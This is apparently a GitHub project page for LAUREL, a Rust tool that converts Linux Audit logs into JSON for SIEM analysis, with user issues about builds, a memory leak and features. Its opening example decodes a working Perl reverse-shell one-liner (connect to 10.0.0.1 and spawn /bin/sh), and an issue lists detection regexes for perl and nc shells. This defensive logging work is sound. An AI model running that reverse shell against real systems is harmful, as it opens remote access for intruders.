Transform Linux Audit logs for SIEM usage

Overview

Linux Audit – Usable, Robust, Easy Logging

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

At the source.

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.
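
To illustrate what the hex-encoding means in practice, here is a minimal sketch of the decoding step; this is for illustration only and is not LAUREL's actual decoder:

    // Decode one hex-encoded audit field (e.g. an EXECVE argument) back
    // into a readable string.
    fn decode_audit_hex(s: &str) -> Option<String> {
        let mut bytes = Vec::with_capacity(s.len() / 2);
        let mut i = 0;
        while i + 2 <= s.len() {
            bytes.push(u8::from_str_radix(s.get(i..i + 2)?, 16).ok()?);
            i += 2;
        }
        Some(String::from_utf8_lossy(&bytes).into_owned())
    }

    fn main() {
        // "2F62696E2F7368" is the hex encoding of "/bin/sh".
        println!("{:?}", decode_audit_hex("2F62696E2F7368"));
    }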

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

Build from source…

LAUREL is written in Rust. To build it, a reasonably recent Rust compiler (we currently use 1.48), cargo, and the libacl library and its header files (Debian: libacl1-dev, RedHat: libacl-devel) are required.

$ cargo build --release
$ sudo install -m755 target/release/laurel /usr/local/sbin/laurel

…or use the provided binary

Static Linux/x86_64 binaries are built for tagged releases.

Configure, use

  • Create a dedicated user, e.g.:
    $ sudo useradd --system --home-dir /var/log/laurel --create-home _laurel
  • Configure LAUREL: Copy the provided annotated example to /etc/laurel/config.toml and customize it.
  • Register LAUREL as an audisp plugin: Copy the provided example to /etc/audisp/plugins.d/laurel.conf or /etc/audit/plugins.d/laurel.conf (depending on your auditd version); a sketch of the typical file contents follows after this list.
  • Tell auditd(8) to re-evaluate its configuration:
    $ sudo pkill -HUP auditd
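
For reference, an audisp plugin file typically looks like the sketch below; treat the example file shipped with LAUREL as authoritative, since the exact values here are assumptions:

    active = yes
    direction = out
    path = /usr/local/sbin/laurel
    type = always
    args = --config /etc/laurel/config.toml
    format = string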

License

GNU General Public License, version 3

Authors

Comments
  • Issues installing on C7

    Any ideas?

    $ cargo build --release
       Compiling laurel v0.4.0 (/opt/laurel)
    error: failed to run custom build command for laurel v0.4.0 (/opt/laurel)

    Caused by: process didn't exit successfully: /opt/laurel/target/release/build/laurel-8d418fa9b5624d53/build-script-build (exit status: 101) --- stderr /usr/include/netinet/in.h:32:8: error: redefinition of 'in_addr' /usr/include/linux/in.h:84:8: note: previous definition is here /usr/include/bits/in.h:155:8: error: redefinition of 'ip_mreqn' /usr/include/linux/in.h:171:8: note: previous definition is here /usr/include/bits/in.h:163:8: error: redefinition of 'in_pktinfo' /usr/include/linux/in.h:220:8: note: previous definition is here /usr/include/netinet/in.h:43:5: error: redefinition of enumerator 'IPPROTO_IP' /usr/include/linux/in.h:28:3: note: previous definition is here /usr/include/netinet/in.h:45:5: error: redefinition of enumerator 'IPPROTO_ICMP' /usr/include/linux/in.h:30:3: note: previous definition is here /usr/include/netinet/in.h:47:5: error: redefinition of enumerator 'IPPROTO_IGMP' /usr/include/linux/in.h:32:3: note: previous definition is here /usr/include/netinet/in.h:49:5: error: redefinition of enumerator 'IPPROTO_IPIP' /usr/include/linux/in.h:34:3: note: previous definition is here /usr/include/netinet/in.h:51:5: error: redefinition of enumerator 'IPPROTO_TCP' /usr/include/linux/in.h:36:3: note: previous definition is here /usr/include/netinet/in.h:53:5: error: redefinition of enumerator 'IPPROTO_EGP' /usr/include/linux/in.h:38:3: note: previous definition is here /usr/include/netinet/in.h:55:5: error: redefinition of enumerator 'IPPROTO_PUP' /usr/include/linux/in.h:40:3: note: previous definition is here /usr/include/netinet/in.h:57:5: error: redefinition of enumerator 'IPPROTO_UDP' /usr/include/linux/in.h:42:3: note: previous definition is here /usr/include/netinet/in.h:59:5: error: redefinition of enumerator 'IPPROTO_IDP' /usr/include/linux/in.h:44:3: note: previous definition is here /usr/include/netinet/in.h:61:5: error: redefinition of enumerator 'IPPROTO_TP' /usr/include/linux/in.h:46:3: note: previous definition is here /usr/include/netinet/in.h:63:5: error: redefinition of enumerator 'IPPROTO_DCCP' /usr/include/linux/in.h:48:3: note: previous definition is here /usr/include/netinet/in.h:65:5: error: redefinition of enumerator 'IPPROTO_IPV6' /usr/include/linux/in.h:50:3: note: previous definition is here /usr/include/netinet/in.h:67:5: error: redefinition of enumerator 'IPPROTO_RSVP' /usr/include/linux/in.h:52:3: note: previous definition is here /usr/include/netinet/in.h:69:5: error: redefinition of enumerator 'IPPROTO_GRE' /usr/include/linux/in.h:54:3: note: previous definition is here /usr/include/netinet/in.h:71:5: error: redefinition of enumerator 'IPPROTO_ESP' /usr/include/linux/in.h:56:3: note: previous definition is here /usr/include/netinet/in.h:73:5: error: redefinition of enumerator 'IPPROTO_AH' /usr/include/linux/in.h:58:3: note: previous definition is here fatal error: too many errors emitted, stopping now [-ferror-limit=] /usr/include/netinet/in.h:32:8: error: redefinition of 'in_addr', err: true /usr/include/bits/in.h:155:8: error: redefinition of 'ip_mreqn', err: true /usr/include/bits/in.h:163:8: error: redefinition of 'in_pktinfo', err: true /usr/include/netinet/in.h:43:5: error: redefinition of enumerator 'IPPROTO_IP', err: true /usr/include/netinet/in.h:45:5: error: redefinition of enumerator 'IPPROTO_ICMP', err: true /usr/include/netinet/in.h:47:5: error: redefinition of enumerator 'IPPROTO_IGMP', err: true /usr/include/netinet/in.h:49:5: error: redefinition of enumerator 'IPPROTO_IPIP', err: true /usr/include/netinet/in.h:51:5: error: 
redefinition of enumerator 'IPPROTO_TCP', err: true /usr/include/netinet/in.h:53:5: error: redefinition of enumerator 'IPPROTO_EGP', err: true /usr/include/netinet/in.h:55:5: error: redefinition of enumerator 'IPPROTO_PUP', err: true /usr/include/netinet/in.h:57:5: error: redefinition of enumerator 'IPPROTO_UDP', err: true /usr/include/netinet/in.h:59:5: error: redefinition of enumerator 'IPPROTO_IDP', err: true /usr/include/netinet/in.h:61:5: error: redefinition of enumerator 'IPPROTO_TP', err: true /usr/include/netinet/in.h:63:5: error: redefinition of enumerator 'IPPROTO_DCCP', err: true /usr/include/netinet/in.h:65:5: error: redefinition of enumerator 'IPPROTO_IPV6', err: true /usr/include/netinet/in.h:67:5: error: redefinition of enumerator 'IPPROTO_RSVP', err: true /usr/include/netinet/in.h:69:5: error: redefinition of enumerator 'IPPROTO_GRE', err: true /usr/include/netinet/in.h:71:5: error: redefinition of enumerator 'IPPROTO_ESP', err: true /usr/include/netinet/in.h:73:5: error: redefinition of enumerator 'IPPROTO_AH', err: true fatal error: too many errors emitted, stopping now [-ferror-limit=], err: true thread 'main' panicked at 'unable to generate bindings: ()', build.rs:114:10 note: run with RUST_BACKTRACE=1 environment variable to display a backtrace

    opened by 100110010111 14
  • Laurel 0.3.1 seems to have a memory leak.

    While testing Laurel v0.3.1 on a Debian Bullseye node with a 5.15.32 kernel, I noticed a pretty significant upward curve in memory usage that keeps incrementing without stabilizing and seems indicative of a memory leak.

    When running laurel under Valgrind, it flags some memory as possibly lost.

    ==1524972== LEAK SUMMARY:
    ==1524972==    definitely lost: 0 bytes in 0 blocks
    ==1524972==    indirectly lost: 0 bytes in 0 blocks
    ==1524972==      possibly lost: 318 bytes in 7 blocks
    ==1524972==    still reachable: 298,337 bytes in 2,601 blocks
    ==1524972==         suppressed: 0 bytes in 0 blocks
    

    From the Valgrind documentation:

    "Possibly lost". This means that a chain of one or more pointers to the block has been found, but at least one of the pointers is an interior-pointer. This could just be a random value in memory that happens to point into a block, and so you shouldn't consider this ok unless you know you have interior-pointers.

    This seems to suggest that there is some memory that is not being freed accordingly.

    CPU usage, although it increased after laurel was registered as an auditd plugin, did stabilize soon after, but memory just keeps shooting up. I have also attached a few screenshots depicting the memory increase via Prometheus metrics.

    Screen Shot 2022-05-06 at 1 08 44 PM

    Laurel was deployed as an auditd plugin on 04/27/2022 in the above screenshot.

    Screen Shot 2022-05-06 at 1 15 20 PM

    On another machine, the memory aggressively shoots up within a few seconds.

    Would like to hear any comments/opinions on this.

    opened by adduali1310 13
  • Processing remotely generated audit events received from au-remote

    Heya folks,

    Is there anything stopping laurel from processing audit logs sent to another server via au-remote? That is, do audisp plugins require explicit support for remote audit logs, or should it not matter and "just work"?

    Auditd supports running audisp plugins against remotely received logs using the dispatch_network = yes config item. I've tested this setting and gotten it to work with the syslog plugin that ships with CentOS, so audisp plugins can at least in principle process logs from remote sources.

    Try as I might, I can't seem to get laurel to write out the remote logs; though the locally generated events are working.

    Great project by the way, love your work!

    opened by jordaneyres 12
  • Let's consider dealing more gracefully with missing EOEs

    I suppose we could deal with missing end-of-event messages (see #14) more gracefully by changing Coalesce::process_line to enqueue objects instead of returning them.

    opened by hillu 11
  • Laurel doesn't run with non-local users

    We need to run laurel on systems where local users can't be created. Laurel seems to check /etc/passwd for the users defined in config.toml with user= and read-users=. If one or both of these users (in our case, both) are AD users, laurel will not start:

    Jul 01 14:40:20 <hostname> /DATA/auditd/bin/laurel[129859]: user xxxxauditd not found

    Can support for non-local users be implemented?

    # id xxxxauditd
    uid=30019(xxxxauditd) gid=4305(xxx) groups=4305(xxx),4550(nopass01)
    # id xxxxsplunk
    uid=25581(xxxxsplunk) gid=4305(xxx) groups=4305(xxx),1290(suapache)
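
    One possible direction, sketched here as an assumption (using the nix crate) rather than as LAUREL's current behaviour, would be to resolve users via getpwnam(3), which goes through NSS and therefore also finds AD/SSSD-backed users, instead of reading /etc/passwd:

    use nix::unistd::User;

    // Sketch: look the configured user up via getpwnam(3)/NSS instead of
    // parsing /etc/passwd, so that directory-backed users resolve, too.
    fn resolve_uid(name: &str) -> Option<nix::unistd::Uid> {
        User::from_name(name).ok().flatten().map(|u| u.uid)
    }

    fn main() {
        println!("{:?}", resolve_uid("xxxxauditd"));
    }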
    
    opened by sraue 9
  • Consider using Nom for parsing

    I'm opening this issue in the spirit of a discussion. I'm far from an expert (or even a novice, really) with parsing, but I'll give you my reason for asking: I was hoping to contribute to laurel (specifically in the parser) and went to learn how peg works. I couldn't find a single tutorial. Obviously you learned peg to write the code, but I found a huge wealth of material on nom, and it seems like a much more widely used and embraced parsing library. I realize this is a bit of a holy war, but for security software, especially parsers, I wonder whether using a more widely adopted library might be considered. (I also find nom code, which is not macro-based, much easier to read and understand.) Would this change be something you'd consider if somebody contributed it?

    opened by zmackie 9
  • Request to provide a library crate if possible

    Thank you for this useful project.

    I am wondering if it would be possible for you to provide a library crate so that other projects can use laurel features. This way we don't have to re-invent the wheel and can depend on laurel as upstream.

    Use case I am looking at: Instead of logging into a file, push to a redis instance or some other queue for processing in a different way.

    opened by kushaldas 9
  • Add support for rsyslog lumberjack mechanism

    Hi! Thanks for this software!

    I am opening this PR to add functionality I am interested in, to better integrate the auditd machinery with rsyslog. The core of the feature is letting rsyslog recognize the beginning of a JSON structure in a log line, which is achieved by prepending a cookie (@cee:) to the line. With laurel running as an auditd plugin, this means the cookie should be present at the beginning of each line. I first thought of implementing a custom serde serializer, but this is impossible, as a serializer has no notion of nesting level and cannot tell when an object is at the beginning of a line. The approach I took here is a custom writer (an implementation of std::io::Write) that mimics a BufWriter, buffering per line in an internal buffer instead of flushing based on byte count. To enable this mechanism, I added a new section to the configuration file with a single boolean option

    [out_format]
    lumberjack = true

    that defaults to false (the current behavior).
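
    For illustration, a minimal sketch of such a line-cookie writer; this is an assumption about the approach, not the PR's actual code:

    use std::io::{self, Write};

    // A Write wrapper that prepends the "@cee:" cookie at the start of
    // every line it forwards to the inner writer.
    struct CeeWriter<W: Write> {
        inner: W,
        at_line_start: bool,
    }

    impl<W: Write> Write for CeeWriter<W> {
        fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
            for &b in buf {
                if self.at_line_start {
                    self.inner.write_all(b"@cee:")?;
                    self.at_line_start = false;
                }
                self.inner.write_all(&[b])?;
                if b == b'\n' {
                    self.at_line_start = true;
                }
            }
            Ok(buf.len())
        }

        fn flush(&mut self) -> io::Result<()> {
            self.inner.flush()
        }
    }

    fn main() -> io::Result<()> {
        let mut w = CeeWriter { inner: io::stdout(), at_line_start: true };
        w.write_all(b"{\"EXECVE\":{\"argc\":3}}\n")
    }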

    You will notice that there are A LOT of lines in the PR diff. This is because I use (neo)vim and rust-analyzer in the language server machinery. It is not feasible for me to work without it, and this machinery autoformats the code on each save. I ran cargo fmt on the whole code base and saved it as the first commit. The remaining commits in the PR implement what I described above. I beg you to accept this not as a disrespectful act, but rather as a way for you and me to foster public collaboration :innocent:

    opened by leophys 8
  • Error when executing /usr/local/sbin/laurel after build/install

    After building and installing laurel on CentOS Linux release 8.4.2105 (/etc/redhat-release), following the instructions and without encountering any particular problem, the executable doesn't work: /usr/local/sbin/laurel --config /etc/laurel/config.toml => /usr/local/sbin/laurel: fatal error 'called Option::unwrap() on a None value' at src/file_handling.rs:63,14

    opened by hashbdev 8
  • Key filter

    This PR implements key-based filtering of auditd events. Keys are specified in laurel.conf:

    [filter]
    filter-keys = ["filter-this"]

    #24 Currently it only drops the whole message

    Looking forward to your feedback.

    opened by Hu6li 7
  • Add option to replace UNIX epoch with ISO timestamp in log output

    This request is focused primarily on using Splunk as the target SIEM.

    Splunk's time-series index files (TSIDX) map "words" or segments to their frequency in the logs they are associated with. The use of UNIX epoch timestamps creates a 1:1 mapping with the event's timestamp: each epoch value occurs (usually) only once. On busy systems, this creates what are colloquially known as TSIDX explosions, where the .tsidx files grow larger than the raw log data they correspond to.

    To prevent this behaviour, it is recommended to use ISO timestamps instead of UNIX epoch values, as their segmented components occur more frequently, thus reducing the number of unique TSIDX entries.

    As this request may not be useful for all scenarios, it can be something optionally enabled within the config.toml file.

    Example event (expanded with jq):

    {
     "ID": "199",
     "_time": "2022-08-07T17:39:25-0000",
     "SERVICE_STOP": {
       "pid": 1,
       "uid": 0,
       "auid": 4294967295,
       "ses": 4294967295,
       "subj": "system_u:system_r:init_t:s0",
       "msg": "unit=dnf-makecache comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success",
       "UID": "root",
       "AUID": "unset"
     }
    }
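
    For illustration, a sketch of the epoch-to-ISO conversion using the chrono crate (an assumption, not the requested implementation):

    use chrono::{SecondsFormat, TimeZone, Utc};

    fn main() {
        // Convert an audit epoch timestamp such as 1626611363.720 into an
        // RFC 3339 / ISO 8601 string.
        let ts = Utc.timestamp_opt(1626611363, 720_000_000).unwrap();
        // Prints 2021-07-18T12:29:23.720Z
        println!("{}", ts.to_rfc3339_opts(SecondsFormat::Millis, true));
    }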
    
    question 
    opened by yorokobi 7
  • Label processes based on a regexp over ARGV

    I have been asked about using the process labeling feature based not only on the executable but also on the argument list.

    I currently see practical implementation problems with this: The regexp engine from the regex crate has the nice feature of providing a multi-pattern matcher. However, it can only work on fixed buffers, not on input streams that are constructed as they are fed to the matcher. So we'd have to copy every argument list before matching, resulting in (I fear) considerable CPU and memory overhead even before the matcher gets to run. I am not aware of an alternative regexp implementation that could be used instead.
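
    For the sake of discussion, a minimal sketch (an assumption, not LAUREL code) of what the copy-then-match approach would look like with a RegexSet:

    use regex::RegexSet;

    // Join the argument list into one temporary buffer (the copy discussed
    // above) and return the indices of all patterns that match it.
    fn matching_patterns(set: &RegexSet, argv: &[&str]) -> Vec<usize> {
        let joined = argv.join(" ");
        set.matches(&joined).into_iter().collect()
    }

    fn main() {
        let set = RegexSet::new([r"perl\s+-e", r"\bnc\b.*-e"]).unwrap();
        let argv = ["perl", "-e", "use Socket;..."];
        println!("{:?}", matching_patterns(&set, &argv));
    }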

    This issue needs some more thinking about.

    Concrete use-cases of process invocations would certainly be useful, please add them in the comments.

    enhancement help wanted 
    opened by hillu 0
  • Scripts and binaries

    From observation: Executing scripts (using a #! line) produces a slightly different set of event records than executing an ELF binary:

    When running scripts, SYSCALL.exe contains the interpreter (/bin/bash, /bin/sh, /usr/bin/perl, etc.), but the first PATH.name contains the script that has been invoked through execve.

    When running ELF executables (no matter whether they are statically or dynamically linked), SYSCALL.exe and the first PATH.name are equal.

    I assume that a simple string compare between SYSCALL.exe and PATH[0].name can be used to determine whether a binary or a script is being run. (This needs to be verified, probably using Linux kernel sources.) If this is true, it could be used to log the script name and possibly set labels based on the script name.
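
    For illustration, the check sketched as code (an assumption based on the hypothesis above, not verified LAUREL behaviour):

    // For ELF binaries both fields point at the same file; for interpreted
    // scripts, SYSCALL.exe is the interpreter and PATH[0].name the script.
    fn looks_like_script(syscall_exe: &str, first_path_name: &str) -> bool {
        syscall_exe != first_path_name
    }

    fn main() {
        println!("{}", looks_like_script("/usr/bin/perl", "/tmp/foo.pl"));
        println!("{}", looks_like_script("/usr/bin/id", "/usr/bin/id"));
    }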

    opened by hillu 1
  • Log uid_map

    go-audit enriches its events with a uid_map table, so the container's inside view of the user namespace can be seen, cf. #98.

    Not quite sure how to implement this yet.

    opened by hillu 0
  • Add name-based information to container info

    The following bits of information require talking to a container runtime. They require #97 to be resolved.

    • image
    • name
    • pod_uid
    • pod_name
    • pod_namespace
    opened by hillu 0
  • LAUREL should not output resolved *uid, *gid if *UID, *GID are already in the input data.

    If auditd has been configured with log_format=ENRICHED, LAUREL should not repeat the work already done, even if translate.user-db has been set to true.

    We want the same behavior as for SYSCALL.ARCH and SYSCALL.SYSCALL.

    opened by hillu 0
  • Provide commandline-field from /proc for every kind of syscall

    The suggestion is to provide a commandline-field, filled from /proc, for every kind of syscall event. At the moment Laurel provides the PPID-commandline via PARENT_INFO.ARGV for every syscall, while SYSCALL.ARGV only contains the PID-commandline for EXECVE-syscalls.

    Considering queries/detections that use any other type of syscall, including open() for file access watches from auditd.rules, a particular Laurel event provides the PPID- but not the PID-commandline (except execve() of course). This calls for a join-operation by PID, only to get the commandline args.
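
    For illustration, a minimal sketch (an assumption, not LAUREL code) of filling such a field from /proc:

    use std::fs;

    // Read /proc/<pid>/cmdline and split it on NUL bytes to recover the
    // argument vector for any kind of syscall event.
    fn proc_cmdline(pid: u32) -> std::io::Result<Vec<String>> {
        let raw = fs::read(format!("/proc/{}/cmdline", pid))?;
        Ok(raw
            .split(|b| *b == 0)
            .filter(|part| !part.is_empty())
            .map(|part| String::from_utf8_lossy(part).into_owned())
            .collect())
    }

    fn main() {
        // Print this process's own command line as an example.
        println!("{:?}", proc_cmdline(std::process::id()));
    }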


    We want to add another SYSCALL.ARGV, but there's already one there :)

    At the moment there are:

    • SYSCALL.ARGV, which uses decoded and concatenated a0, a1, ... values from Auditd's type=SYSCALL records
    • PARENT_INFO.ARGV, which uses /proc/$PPID/cmdline

    The latter looks the same for execve-syscalls, but the sources of information differ, although "ARGV" suggests something different. This becomes more obvious for other syscalls like socket, where SYSCALL.ARGV contains hex values. I think this would be a good chance to eliminate this inconsistency.


    I suggest renaming PARENT_INFO.ARGV ---> PARENT_INFO.CMD. For the implementation of the PID-commandline we can add SYSCALL.CMD (or whatever). Reasoning:

    • ARGV still makes sense for syscalls of any kind and should be always enriched to a list. It still has added value whether it's execve() or any other syscall.
    • Messing with PARENT_INFO instead of SYSCALL breaks fewer existing detection rules. The biggest pain has been EXECVE params and their encoding. Imho, people rely more on the latter than on PARENT_INFO.

    I am a little unsure whether the encoding/concat handling for EXECVE still makes sense. It's basically the same info, twice. Should this still remain? I think it would make sense to keep SYSCALL.ARGV, but only as a concatenated list, and save the encoding part in EXECVE for performance reasons. The downside: we should make the commandline field from /proc entirely optional. This makes sense for use cases like https://github.com/threathunters-io/laurel/issues/33 and "I just don't need it" scenarios. Then the current Laurel processing of type=EXECVE records becomes necessary.


    The summary for discussion

    1. Add commandline from /proc/$PID/cmdline for every syscall.
    2. Rename PARENT_INFO.ARGV ---> PARENT_INFO.CMD instead of messing with SYSCALL.ARGV
    3. CMD, COMMANDLINE or something else? CommandLine would help with Sysmon compatibility, but it doesn't fit Laurel's ALLCAPS convention for added/enriched fields. Imho, CMD.
    4. Should ARGV encoding/enrichment stay alive in the original form?
    5. Make all of the discussed points configurable, including execve-argv = [ "array", "string", "none" ]
    opened by disasmwinnie 1